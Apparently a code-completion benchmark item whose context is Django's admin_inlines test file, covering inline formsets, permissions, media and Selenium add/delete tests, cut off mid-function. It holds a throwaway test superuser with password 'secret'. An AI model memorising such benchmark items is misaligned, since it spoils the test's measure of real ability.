gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
from __future__ import unicode_literals
import datetime
from django.contrib.admin import ModelAdmin, TabularInline
from django.contrib.admin.helpers import InlineAdminForm
from django.contrib.admin.tests import AdminSeleniumWebDriverTestCase
from django.contrib.auth.models import Permission, User
from django.contrib.contenttypes.models import ContentType
from django.test import RequestFactory, TestCase, override_settings
from django.urls import reverse
from .admin import InnerInline, site as admin_site
from .models import (
Author, BinaryTree, Book, Chapter, Child, ChildModel1, ChildModel2,
Fashionista, FootNote, Holder, Holder2, Holder3, Holder4, Inner, Inner2,
Inner3, Inner4Stacked, Inner4Tabular, Novel, OutfitItem, Parent,
ParentModelWithCustomPk, Person, Poll, Profile, ProfileCollection,
Question, Sighting, SomeChildModel, SomeParentModel, Teacher,
)
INLINE_CHANGELINK_HTML = 'class="inlinechangelink">Change</a>'
class TestDataMixin(object):
@classmethod
def setUpTestData(cls):
# password = "secret"
User.objects.create(
pk=100, username='super', first_name='Super', last_name='User', email='super@example.com',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
is_staff=True, last_login=datetime.datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime.datetime(2007, 5, 30, 13, 20, 10)
)
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF="admin_inlines.urls")
class TestInline(TestDataMixin, TestCase):
def setUp(self):
holder = Holder(dummy=13)
holder.save()
Inner(dummy=42, holder=holder).save()
result = self.client.login(username='super', password='secret')
self.assertEqual(result, True)
self.factory = RequestFactory()
def test_can_delete(self):
"""
can_delete should be passed to inlineformset factory.
"""
holder = Holder.objects.get(dummy=13)
response = self.client.get(
reverse('admin:admin_inlines_holder_change', args=(holder.id,))
)
inner_formset = response.context['inline_admin_formsets'][0].formset
expected = InnerInline.can_delete
actual = inner_formset.can_delete
self.assertEqual(expected, actual, 'can_delete must be equal')
def test_readonly_stacked_inline_label(self):
"""Bug #13174."""
holder = Holder.objects.create(dummy=42)
Inner.objects.create(holder=holder, dummy=42, readonly='')
response = self.client.get(
reverse('admin:admin_inlines_holder_change', args=(holder.id,))
)
self.assertContains(response, '<label>Inner readonly label:</label>')
def test_many_to_many_inlines(self):
"Autogenerated many-to-many inlines are displayed correctly (#13407)"
response = self.client.get(reverse('admin:admin_inlines_author_add'))
# The heading for the m2m inline block uses the right text
self.assertContains(response, '<h2>Author-book relationships</h2>')
# The "add another" label is correct
self.assertContains(response, 'Add another Author-book relationship')
# The '+' is dropped from the autogenerated form prefix (Author_books+)
self.assertContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_primary(self):
person = Person.objects.create(firstname='Imelda')
item = OutfitItem.objects.create(name='Shoes')
# Imelda likes shoes, but can't carry her own bags.
data = {
'shoppingweakness_set-TOTAL_FORMS': 1,
'shoppingweakness_set-INITIAL_FORMS': 0,
'shoppingweakness_set-MAX_NUM_FORMS': 0,
'_save': 'Save',
'person': person.id,
'max_weight': 0,
'shoppingweakness_set-0-item': item.id,
}
response = self.client.post(reverse('admin:admin_inlines_fashionista_add'), data)
self.assertEqual(response.status_code, 302)
self.assertEqual(len(Fashionista.objects.filter(person__firstname='Imelda')), 1)
def test_custom_form_tabular_inline_label(self):
"""
A model form with a form field specified (TitleForm.title1) should have
its label rendered in the tabular inline.
"""
response = self.client.get(reverse('admin:admin_inlines_titlecollection_add'))
self.assertContains(response, '<th class="required">Title1</th>', html=True)
def test_tabular_non_field_errors(self):
"""
Ensure that non_field_errors are displayed correctly, including the
right value for colspan. Refs #13510.
"""
data = {
'title_set-TOTAL_FORMS': 1,
'title_set-INITIAL_FORMS': 0,
'title_set-MAX_NUM_FORMS': 0,
'_save': 'Save',
'title_set-0-title1': 'a title',
'title_set-0-title2': 'a different title',
}
response = self.client.post(reverse('admin:admin_inlines_titlecollection_add'), data)
# Here colspan is "4": two fields (title1 and title2), one hidden field and the delete checkbox.
self.assertContains(
response,
'<tr><td colspan="4"><ul class="errorlist nonfield">'
'<li>The two titles must be the same</li></ul></td></tr>'
)
def test_no_parent_callable_lookup(self):
"""Admin inline `readonly_field` shouldn't invoke parent ModelAdmin callable"""
# Identically named callable isn't present in the parent ModelAdmin,
# rendering of the add view shouldn't explode
response = self.client.get(reverse('admin:admin_inlines_novel_add'))
self.assertEqual(response.status_code, 200)
# View should have the child inlines section
self.assertContains(
response,
'<div class="js-inline-admin-formset inline-group" id="chapter_set-group"'
)
def test_callable_lookup(self):
"""Admin inline should invoke local callable when its name is listed in readonly_fields"""
response = self.client.get(reverse('admin:admin_inlines_poll_add'))
self.assertEqual(response.status_code, 200)
# Add parent object view should have the child inlines section
self.assertContains(
response,
'<div class="js-inline-admin-formset inline-group" id="question_set-group"'
)
# The right callable should be used for the inline readonly_fields
# column cells
self.assertContains(response, '<p>Callable in QuestionInline</p>')
def test_help_text(self):
"""
Ensure that the inlines' model field help texts are displayed when
using both the stacked and tabular layouts.
Ref #8190.
"""
response = self.client.get(reverse('admin:admin_inlines_holder4_add'))
self.assertContains(response, '<p class="help">Awesome stacked help text is awesome.</p>', 4)
self.assertContains(
response,
'<img src="/static/admin/img/icon-unknown.svg" '
'class="help help-tooltip" width="10" height="10" '
'alt="(Awesome tabular help text is awesome.)" '
'title="Awesome tabular help text is awesome." />',
1
)
# ReadOnly fields
response = self.client.get(reverse('admin:admin_inlines_capofamiglia_add'))
self.assertContains(
response,
'<img src="/static/admin/img/icon-unknown.svg" '
'class="help help-tooltip" width="10" height="10" '
'alt="(Help text for ReadOnlyInline)" '
'title="Help text for ReadOnlyInline" />',
1
)
def test_inline_hidden_field_no_column(self):
"""#18263 -- Make sure hidden fields don't get a column in tabular inlines"""
parent = SomeParentModel.objects.create(name='a')
SomeChildModel.objects.create(name='b', position='0', parent=parent)
SomeChildModel.objects.create(name='c', position='1', parent=parent)
response = self.client.get(reverse('admin:admin_inlines_someparentmodel_change', args=(parent.pk,)))
self.assertNotContains(response, '<td class="field-position">')
self.assertContains(response, (
'<input id="id_somechildmodel_set-1-position" '
'name="somechildmodel_set-1-position" type="hidden" value="1" />'))
def test_non_related_name_inline(self):
"""
Ensure that multiple inlines with related_name='+' have correct form
prefixes. Bug #16838.
"""
response = self.client.get(reverse('admin:admin_inlines_capofamiglia_add'))
self.assertContains(response,
'<input type="hidden" name="-1-0-id" id="id_-1-0-id" />', html=True)
self.assertContains(response,
'<input type="hidden" name="-1-0-capo_famiglia" id="id_-1-0-capo_famiglia" />', html=True)
self.assertContains(response,
'<input id="id_-1-0-name" type="text" class="vTextField" '
'name="-1-0-name" maxlength="100" />', html=True)
self.assertContains(response,
'<input type="hidden" name="-2-0-id" id="id_-2-0-id" />', html=True)
self.assertContains(response,
'<input type="hidden" name="-2-0-capo_famiglia" id="id_-2-0-capo_famiglia" />', html=True)
self.assertContains(response,
'<input id="id_-2-0-name" type="text" class="vTextField" '
'name="-2-0-name" maxlength="100" />', html=True)
@override_settings(USE_L10N=True, USE_THOUSAND_SEPARATOR=True)
def test_localize_pk_shortcut(self):
"""
Ensure that the "View on Site" link is correct for locales that use
thousand separators
"""
holder = Holder.objects.create(pk=123456789, dummy=42)
inner = Inner.objects.create(pk=987654321, holder=holder, dummy=42, readonly='')
response = self.client.get(reverse('admin:admin_inlines_holder_change', args=(holder.id,)))
inner_shortcut = 'r/%s/%s/' % (ContentType.objects.get_for_model(inner).pk, inner.pk)
self.assertContains(response, inner_shortcut)
def test_custom_pk_shortcut(self):
"""
Ensure that the "View on Site" link is correct for models with a
custom primary key field. Bug #18433.
"""
parent = ParentModelWithCustomPk.objects.create(my_own_pk="foo", name="Foo")
child1 = ChildModel1.objects.create(my_own_pk="bar", name="Bar", parent=parent)
child2 = ChildModel2.objects.create(my_own_pk="baz", name="Baz", parent=parent)
response = self.client.get(reverse('admin:admin_inlines_parentmodelwithcustompk_change', args=('foo',)))
child1_shortcut = 'r/%s/%s/' % (ContentType.objects.get_for_model(child1).pk, child1.pk)
child2_shortcut = 'r/%s/%s/' % (ContentType.objects.get_for_model(child2).pk, child2.pk)
self.assertContains(response, child1_shortcut)
self.assertContains(response, child2_shortcut)
def test_create_inlines_on_inherited_model(self):
"""
Ensure that an object can be created with inlines when it inherits
another class. Bug #19524.
"""
data = {
'name': 'Martian',
'sighting_set-TOTAL_FORMS': 1,
'sighting_set-INITIAL_FORMS': 0,
'sighting_set-MAX_NUM_FORMS': 0,
'sighting_set-0-place': 'Zone 51',
'_save': 'Save',
}
response = self.client.post(reverse('admin:admin_inlines_extraterrestrial_add'), data)
self.assertEqual(response.status_code, 302)
self.assertEqual(Sighting.objects.filter(et__name='Martian').count(), 1)
def test_custom_get_extra_form(self):
bt_head = BinaryTree.objects.create(name="Tree Head")
BinaryTree.objects.create(name="First Child", parent=bt_head)
# The maximum number of forms should respect 'get_max_num' on the
# ModelAdmin
max_forms_input = (
'<input id="id_binarytree_set-MAX_NUM_FORMS" '
'name="binarytree_set-MAX_NUM_FORMS" type="hidden" value="%d" />'
)
# The total number of forms will remain the same in either case
total_forms_hidden = (
'<input id="id_binarytree_set-TOTAL_FORMS" '
'name="binarytree_set-TOTAL_FORMS" type="hidden" value="2" />'
)
response = self.client.get(reverse('admin:admin_inlines_binarytree_add'))
self.assertContains(response, max_forms_input % 3)
self.assertContains(response, total_forms_hidden)
response = self.client.get(reverse('admin:admin_inlines_binarytree_change', args=(bt_head.id,)))
self.assertContains(response, max_forms_input % 2)
self.assertContains(response, total_forms_hidden)
def test_min_num(self):
"""
Ensure that min_num and extra determine number of forms.
"""
class MinNumInline(TabularInline):
model = BinaryTree
min_num = 2
extra = 3
modeladmin = ModelAdmin(BinaryTree, admin_site)
modeladmin.inlines = [MinNumInline]
min_forms = (
'<input id="id_binarytree_set-MIN_NUM_FORMS" '
'name="binarytree_set-MIN_NUM_FORMS" type="hidden" value="2" />'
)
total_forms = (
'<input id="id_binarytree_set-TOTAL_FORMS" '
'name="binarytree_set-TOTAL_FORMS" type="hidden" value="5" />'
)
request = self.factory.get(reverse('admin:admin_inlines_binarytree_add'))
request.user = User(username='super', is_superuser=True)
response = modeladmin.changeform_view(request)
self.assertContains(response, min_forms)
self.assertContains(response, total_forms)
def test_custom_min_num(self):
"""
Ensure that get_min_num is called and used correctly.
"""
bt_head = BinaryTree.objects.create(name="Tree Head")
BinaryTree.objects.create(name="First Child", parent=bt_head)
class MinNumInline(TabularInline):
model = BinaryTree
extra = 3
def get_min_num(self, request, obj=None, **kwargs):
if obj:
return 5
return 2
modeladmin = ModelAdmin(BinaryTree, admin_site)
modeladmin.inlines = [MinNumInline]
min_forms = (
'<input id="id_binarytree_set-MIN_NUM_FORMS" '
'name="binarytree_set-MIN_NUM_FORMS" type="hidden" value="%d" />'
)
total_forms = (
'<input id="id_binarytree_set-TOTAL_FORMS" '
'name="binarytree_set-TOTAL_FORMS" type="hidden" value="%d" />'
)
request = self.factory.get(reverse('admin:admin_inlines_binarytree_add'))
request.user = User(username='super', is_superuser=True)
response = modeladmin.changeform_view(request)
self.assertContains(response, min_forms % 2)
self.assertContains(response, total_forms % 5)
request = self.factory.get(reverse('admin:admin_inlines_binarytree_change', args=(bt_head.id,)))
request.user = User(username='super', is_superuser=True)
response = modeladmin.changeform_view(request, object_id=str(bt_head.id))
self.assertContains(response, min_forms % 5)
self.assertContains(response, total_forms % 8)
def test_inline_nonauto_noneditable_pk(self):
response = self.client.get(reverse('admin:admin_inlines_author_add'))
self.assertContains(
response,
'<input id="id_nonautopkbook_set-0-rand_pk" '
'name="nonautopkbook_set-0-rand_pk" type="hidden" />',
html=True
)
self.assertContains(
response,
'<input id="id_nonautopkbook_set-2-0-rand_pk" '
'name="nonautopkbook_set-2-0-rand_pk" type="hidden" />',
html=True
)
def test_inline_editable_pk(self):
response = self.client.get(reverse('admin:admin_inlines_author_add'))
self.assertContains(
response,
'<input class="vIntegerField" id="id_editablepkbook_set-0-manual_pk" '
'name="editablepkbook_set-0-manual_pk" type="text" />',
html=True, count=1
)
self.assertContains(
response,
'<input class="vIntegerField" id="id_editablepkbook_set-2-0-manual_pk" '
'name="editablepkbook_set-2-0-manual_pk" type="text" />',
html=True, count=1
)
def test_stacked_inline_edit_form_contains_has_original_class(self):
holder = Holder.objects.create(dummy=1)
holder.inner_set.create(dummy=1)
response = self.client.get(reverse('admin:admin_inlines_holder_change', args=(holder.pk,)))
self.assertContains(
response,
'<div class="inline-related has_original" id="inner_set-0">',
count=1
)
self.assertContains(
response,
'<div class="inline-related" id="inner_set-1">',
count=1
)
def test_inlines_show_change_link_registered(self):
"Inlines `show_change_link` for registered models when enabled."
holder = Holder4.objects.create(dummy=1)
item1 = Inner4Stacked.objects.create(dummy=1, holder=holder)
item2 = Inner4Tabular.objects.create(dummy=1, holder=holder)
items = (
('inner4stacked', item1.pk),
('inner4tabular', item2.pk),
)
response = self.client.get(reverse('admin:admin_inlines_holder4_change', args=(holder.pk,)))
self.assertTrue(response.context['inline_admin_formset'].opts.has_registered_model)
for model, pk in items:
url = reverse('admin:admin_inlines_%s_change' % model, args=(pk,))
self.assertContains(response, '<a href="%s" %s' % (url, INLINE_CHANGELINK_HTML))
def test_inlines_show_change_link_unregistered(self):
"Inlines `show_change_link` disabled for unregistered models."
parent = ParentModelWithCustomPk.objects.create(my_own_pk="foo", name="Foo")
ChildModel1.objects.create(my_own_pk="bar", name="Bar", parent=parent)
ChildModel2.objects.create(my_own_pk="baz", name="Baz", parent=parent)
response = self.client.get(reverse('admin:admin_inlines_parentmodelwithcustompk_change', args=('foo',)))
self.assertFalse(response.context['inline_admin_formset'].opts.has_registered_model)
self.assertNotContains(response, INLINE_CHANGELINK_HTML)
def test_tabular_inline_show_change_link_false_registered(self):
"Inlines `show_change_link` disabled by default."
poll = Poll.objects.create(name="New poll")
Question.objects.create(poll=poll)
response = self.client.get(reverse('admin:admin_inlines_poll_change', args=(poll.pk,)))
self.assertTrue(response.context['inline_admin_formset'].opts.has_registered_model)
self.assertNotContains(response, INLINE_CHANGELINK_HTML)
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF="admin_inlines.urls")
class TestInlineMedia(TestDataMixin, TestCase):
def setUp(self):
result = self.client.login(username='super', password='secret')
self.assertEqual(result, True)
def test_inline_media_only_base(self):
holder = Holder(dummy=13)
holder.save()
Inner(dummy=42, holder=holder).save()
change_url = reverse('admin:admin_inlines_holder_change', args=(holder.id,))
response = self.client.get(change_url)
self.assertContains(response, 'my_awesome_admin_scripts.js')
def test_inline_media_only_inline(self):
holder = Holder3(dummy=13)
holder.save()
Inner3(dummy=42, holder=holder).save()
change_url = reverse('admin:admin_inlines_holder3_change', args=(holder.id,))
response = self.client.get(change_url)
self.assertContains(response, 'my_awesome_inline_scripts.js')
def test_all_inline_media(self):
holder = Holder2(dummy=13)
holder.save()
Inner2(dummy=42, holder=holder).save()
change_url = reverse('admin:admin_inlines_holder2_change', args=(holder.id,))
response = self.client.get(change_url)
self.assertContains(response, 'my_awesome_admin_scripts.js')
self.assertContains(response, 'my_awesome_inline_scripts.js')
@override_settings(ROOT_URLCONF="admin_inlines.urls")
class TestInlineAdminForm(TestCase):
def test_immutable_content_type(self):
"""Regression for #9362
The problem depends only on InlineAdminForm and its "original"
argument, so we can safely set the other arguments to None/{}. We just
need to check that the content_type argument of Child isn't altered by
the internals of the inline form."""
sally = Teacher.objects.create(name='Sally')
john = Parent.objects.create(name='John')
joe = Child.objects.create(name='Joe', teacher=sally, parent=john)
iaf = InlineAdminForm(None, None, {}, {}, joe)
parent_ct = ContentType.objects.get_for_model(Parent)
self.assertEqual(iaf.original.content_type, parent_ct)
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF="admin_inlines.urls")
class TestInlineProtectedOnDelete(TestDataMixin, TestCase):
def setUp(self):
result = self.client.login(username='super', password='secret')
self.assertEqual(result, True)
def test_deleting_inline_with_protected_delete_does_not_validate(self):
lotr = Novel.objects.create(name='Lord of the rings')
chapter = Chapter.objects.create(novel=lotr, name='Many Meetings')
foot_note = FootNote.objects.create(chapter=chapter, note='yadda yadda')
change_url = reverse('admin:admin_inlines_novel_change', args=(lotr.id,))
response = self.client.get(change_url)
data = {
'name': lotr.name,
'chapter_set-TOTAL_FORMS': 1,
'chapter_set-INITIAL_FORMS': 1,
'chapter_set-MAX_NUM_FORMS': 1000,
'_save': 'Save',
'chapter_set-0-id': chapter.id,
'chapter_set-0-name': chapter.name,
'chapter_set-0-novel': lotr.id,
'chapter_set-0-DELETE': 'on'
}
response = self.client.post(change_url, data)
self.assertContains(response, "Deleting chapter %s would require deleting "
"the following protected related objects: foot note %s"
% (chapter, foot_note))
@override_settings(ROOT_URLCONF="admin_inlines.urls")
class TestInlinePermissions(TestCase):
"""
Make sure the admin respects permissions for objects that are edited
inline. Refs #8060.
"""
def setUp(self):
self.user = User(username='admin')
self.user.is_staff = True
self.user.is_active = True
self.user.set_password('secret')
self.user.save()
self.author_ct = ContentType.objects.get_for_model(Author)
self.holder_ct = ContentType.objects.get_for_model(Holder2)
self.book_ct = ContentType.objects.get_for_model(Book)
self.inner_ct = ContentType.objects.get_for_model(Inner2)
# User always has permissions to add and change Authors, and Holders,
# the main (parent) models of the inlines. Permissions on the inlines
# vary per test.
permission = Permission.objects.get(codename='add_author', content_type=self.author_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_author', content_type=self.author_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='add_holder2', content_type=self.holder_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_holder2', content_type=self.holder_ct)
self.user.user_permissions.add(permission)
author = Author.objects.create(pk=1, name='The Author')
book = author.books.create(name='The inline Book')
self.author_change_url = reverse('admin:admin_inlines_author_change', args=(author.id,))
# Get the ID of the automatically created intermediate model for the Author-Book m2m
author_book_auto_m2m_intermediate = Author.books.through.objects.get(author=author, book=book)
self.author_book_auto_m2m_intermediate_id = author_book_auto_m2m_intermediate.pk
holder = Holder2.objects.create(dummy=13)
inner2 = Inner2.objects.create(dummy=42, holder=holder)
self.holder_change_url = reverse('admin:admin_inlines_holder2_change', args=(holder.id,))
self.inner2_id = inner2.id
self.assertEqual(
self.client.login(username='admin', password='secret'),
True)
def test_inline_add_m2m_noperm(self):
response = self.client.get(reverse('admin:admin_inlines_author_add'))
# No change permission on books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_add_fk_noperm(self):
response = self.client.get(reverse('admin:admin_inlines_holder2_add'))
# No permissions on Inner2s, so no inline
self.assertNotContains(response, '<h2>Inner2s</h2>')
self.assertNotContains(response, 'Add another Inner2')
self.assertNotContains(response, 'id="id_inner2_set-TOTAL_FORMS"')
def test_inline_change_m2m_noperm(self):
response = self.client.get(self.author_change_url)
# No change permission on books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_change_fk_noperm(self):
response = self.client.get(self.holder_change_url)
# No permissions on Inner2s, so no inline
self.assertNotContains(response, '<h2>Inner2s</h2>')
self.assertNotContains(response, 'Add another Inner2')
self.assertNotContains(response, 'id="id_inner2_set-TOTAL_FORMS"')
def test_inline_add_m2m_add_perm(self):
permission = Permission.objects.get(codename='add_book', content_type=self.book_ct)
self.user.user_permissions.add(permission)
response = self.client.get(reverse('admin:admin_inlines_author_add'))
# No change permission on Books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_add_fk_add_perm(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(reverse('admin:admin_inlines_holder2_add'))
# Add permission on inner2s, so we get the inline
self.assertContains(response, '<h2>Inner2s</h2>')
self.assertContains(response, 'Add another Inner2')
self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
'value="3" name="inner2_set-TOTAL_FORMS" />', html=True)
def test_inline_change_m2m_add_perm(self):
permission = Permission.objects.get(codename='add_book', content_type=self.book_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.author_change_url)
# No change permission on books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
self.assertNotContains(response, 'id="id_Author_books-0-DELETE"')
def test_inline_change_m2m_change_perm(self):
permission = Permission.objects.get(codename='change_book', content_type=self.book_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.author_change_url)
# We have change perm on books, so we can add/change/delete inlines
self.assertContains(response, '<h2>Author-book relationships</h2>')
self.assertContains(response, 'Add another Author-book relationship')
self.assertContains(response, '<input type="hidden" id="id_Author_books-TOTAL_FORMS" '
'value="4" name="Author_books-TOTAL_FORMS" />', html=True)
self.assertContains(
response,
'<input type="hidden" id="id_Author_books-0-id" value="%i" '
'name="Author_books-0-id" />' % self.author_book_auto_m2m_intermediate_id,
html=True
)
self.assertContains(response, 'id="id_Author_books-0-DELETE"')
def test_inline_change_fk_add_perm(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Add permission on inner2s, so we can add but not modify existing
self.assertContains(response, '<h2>Inner2s</h2>')
self.assertContains(response, 'Add another Inner2')
# 3 extra forms only, not the existing instance form
self.assertContains(
response,
'<input type="hidden" id="id_inner2_set-TOTAL_FORMS" value="3" '
'name="inner2_set-TOTAL_FORMS" />',
html=True
)
self.assertNotContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)
def test_inline_change_fk_change_perm(self):
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Change permission on inner2s, so we can change existing but not add new
self.assertContains(response, '<h2>Inner2s</h2>')
# Just the one form for existing instances
self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
'value="1" name="inner2_set-TOTAL_FORMS" />', html=True)
self.assertContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)
# max-num 0 means we can't add new ones
self.assertContains(response, '<input type="hidden" id="id_inner2_set-MAX_NUM_FORMS" '
'value="0" name="inner2_set-MAX_NUM_FORMS" />', html=True)
def test_inline_change_fk_add_change_perm(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Add/change perm, so we can add new and change existing
self.assertContains(response, '<h2>Inner2s</h2>')
# One form for existing instance and three extra for new
self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
'value="4" name="inner2_set-TOTAL_FORMS" />', html=True)
self.assertContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)
def test_inline_change_fk_change_del_perm(self):
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='delete_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Change/delete perm on inner2s, so we can change/delete existing
self.assertContains(response, '<h2>Inner2s</h2>')
# One form for existing instance only, no new
self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
'value="1" name="inner2_set-TOTAL_FORMS" />', html=True)
self.assertContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)
self.assertContains(response, 'id="id_inner2_set-0-DELETE"')
def test_inline_change_fk_all_perms(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='delete_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# All perms on inner2s, so we can add/change/delete
self.assertContains(response, '<h2>Inner2s</h2>')
# One form for existing instance only, three for new
self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
'value="4" name="inner2_set-TOTAL_FORMS" />', html=True)
self.assertContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)
self.assertContains(response, 'id="id_inner2_set-0-DELETE"')
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF="admin_inlines.urls")
class SeleniumFirefoxTests(AdminSeleniumWebDriverTestCase):
available_apps = ['admin_inlines'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def setUp(self):
# password = "secret"
User.objects.create(
pk=100, username='super', first_name='Super', last_name='User', email='super@example.com',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
is_staff=True, last_login=datetime.datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime.datetime(2007, 5, 30, 13, 20, 10)
)
def test_add_stackeds(self):
"""
Ensure that the "Add another XXX" link correctly adds items to the
stacked formset.
"""
self.admin_login(username='super', password='secret')
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_inlines_holder4_add')))
inline_id = '#inner4stacked_set-group'
rows_length = lambda: len(self.selenium.find_elements_by_css_selector(
'%s .dynamic-inner4stacked_set' % inline_id))
self.assertEqual(rows_length(), 3)
add_button = self.selenium.find_element_by_link_text(
'Add another Inner4 stacked')
add_button.click()
self.assertEqual(rows_length(), 4)
def test_delete_stackeds(self):
self.admin_login(username='super', password='secret')
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_inlines_holder4_add')))
inline_id = '#inner4stacked_set-group'
rows_length = lambda: len(self.selenium.find_elements_by_css_selector(
'%s .dynamic-inner4stacked_set' % inline_id))
self.assertEqual(rows_length(), 3)
add_button = self.selenium.find_element_by_link_text(
'Add another Inner4 stacked')
add_button.click()
add_button.click()
self.assertEqual(rows_length(), 5, msg="sanity check")
for delete_link in self.selenium.find_elements_by_css_selector(
'%s .inline-deletelink' % inline_id):
delete_link.click()
self.assertEqual(rows_length(), 3)
def test_add_inlines(self):
"""
Ensure that the "Add another XXX" link correctly adds items to the
inline form.
"""
self.admin_login(username='super', password='secret')
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_inlines_profilecollection_add')))
# Check that there's only one inline to start with and that it has the
# correct ID.
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set')), 1)
self.assertEqual(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set')[0].get_attribute('id'),
'profile_set-0')
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set#profile_set-0 input[name=profile_set-0-first_name]')), 1)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set#profile_set-0 input[name=profile_set-0-last_name]')), 1)
# Add an inline
self.selenium.find_element_by_link_text('Add another Profile').click()
# Check that the inline has been added, that it has the right id, and
# that it contains the right fields.
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set')), 2)
self.assertEqual(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set')[1].get_attribute('id'), 'profile_set-1')
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set#profile_set-1 input[name=profile_set-1-first_name]')), 1)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set#profile_set-1 input[name=profile_set-1-last_name]')), 1)
# Let's add another one to be sure
self.selenium.find_element_by_link_text('Add another Profile').click()
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set')), 3)
self.assertEqual(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set')[2].get_attribute('id'), 'profile_set-2')
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set#profile_set-2 input[name=profile_set-2-first_name]')), 1)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'.dynamic-profile_set#profile_set-2 input[name=profile_set-2-last_name]')), 1)
# Enter some data and click 'Save'
self.selenium.find_element_by_name('profile_set-0-first_name').send_keys('0 first name 1')
self.selenium.find_element_by_name('profile_set-0-last_name').send_keys('0 last name 2')
self.selenium.find_element_by_name('profile_set-1-first_name').send_keys('1 first name 1')
self.selenium.find_element_by_name('profile_set-1-last_name').send_keys('1 last name 2')
self.selenium.find_element_by_name('profile_set-2-first_name').send_keys('2 first name 1')
self.selenium.find_element_by_name('profile_set-2-last_name').send_keys('2 last name 2')
self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
self.wait_page_loaded()
# Check that the objects have been created in the database
self.assertEqual(ProfileCollection.objects.all().count(), 1)
self.assertEqual(Profile.objects.all().count(), 3)
def test_delete_inlines(self):
self.admin_login(username='super', password='secret')
self.selenium.get('%s%s' % (self.live_server_url,
